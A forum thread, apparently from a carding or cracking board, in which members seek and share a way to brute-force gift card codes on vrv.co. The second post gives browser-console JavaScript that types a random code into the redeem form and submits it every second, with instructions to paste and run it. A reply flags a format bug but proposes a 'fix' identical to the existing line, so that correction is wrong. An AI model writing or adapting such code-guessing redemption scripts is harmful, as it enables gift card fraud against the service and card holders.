Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



 1024

VRV.CO Gift Card Checker

by eric - 10 July, 2020 - 07:13 PM
This post is by a banned member (eric) - Unhide
eric  
Infinity
231
Posts
90
Threads
5 Years of service
#1
Making a gen isn't that hard as the characters are only capital letters and numbers, but is it possible for anybody to make a gift card checker for this site?
The redeem link is 
https://vrv.co/redeem and you need an account logged in to redeem the gift card.

Some codes below are already used codes, but they give an example of what they're supposed to look like:


RGQX-E87M-5KYL
GX98-JN8U-XD25


Thanks in advance for everyone that tries to help out.  Pepelove 
This post is by a banned member (IdeaPad) - Unhide
IdeaPad  
Supreme
28
Posts
7
Threads
5 Years of service
#2
(This post was last modified: 11 July, 2020 - 01:22 AM by IdeaPad.)
This should work, but any format you send to it will return an error 409 "There was a problem redeeming this gift card" but I don't know if that's the error that the code doesn't exist.

Instructions:
  • Open the browser console (ctrl+shift+i) or f12
  • Paste the code below into the console
  • Press enter and wait.
 
Code:
function makeid() {
    let text = "";
    let possible = "1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    for (let x = 0; x < 3; x++) {
      for (let i = 0; i < 5; i++) {
        text += possible.charAt(Math.floor(Math.random() * possible.length));
      }
      if (x < 2)text += '-';
    }
    return text;
}


function main() {
    console.log(makeid());
    document.querySelector("input[name='giftcardnumber']").value = makeid();
    document.querySelector("div[class=' c-button -type-one']").click();
}

setInterval(function() {
    main();
}, 1000);
This post is by a banned member (m1st3rk) - Unhide
m1st3rk  
Supreme
73
Posts
4
Threads
3 Years of service
#3
(11 July, 2020 - 01:20 AM)IdeaPad Wrote: Show More
This should work, but any format you send to it will return an error 409 "There was a problem redeeming this gift card" but I don't know if that's the error that the code doesn't exist.

Instructions:
  • Open the browser console (ctrl+shift+i) or f12
  • Paste the code below into the console
  • Press enter and wait.
 
Code:
function makeid() {
    let text = "";
    let possible = "1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    for (let x = 0; x < 3; x++) {
      for (let i = 0; i < 5; i++) {
        text += possible.charAt(Math.floor(Math.random() * possible.length));
      }
      if (x < 2)text += '-';
    }
    return text;
}


function main() {
    console.log(makeid());
    document.querySelector("input[name='giftcardnumber']").value = makeid();
    document.querySelector("div[class=' c-button -type-one']").click();
}

setInterval(function() {
    main();
}, 1000);


Crazy, boy! 
​​​​​​​
But it return 12345-12345-12345 values, and it should be 1234-1234-1234.

It should be "for (let i = 0; i < 5; i++) {" at line 5.
 
 

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 2 Guest(s)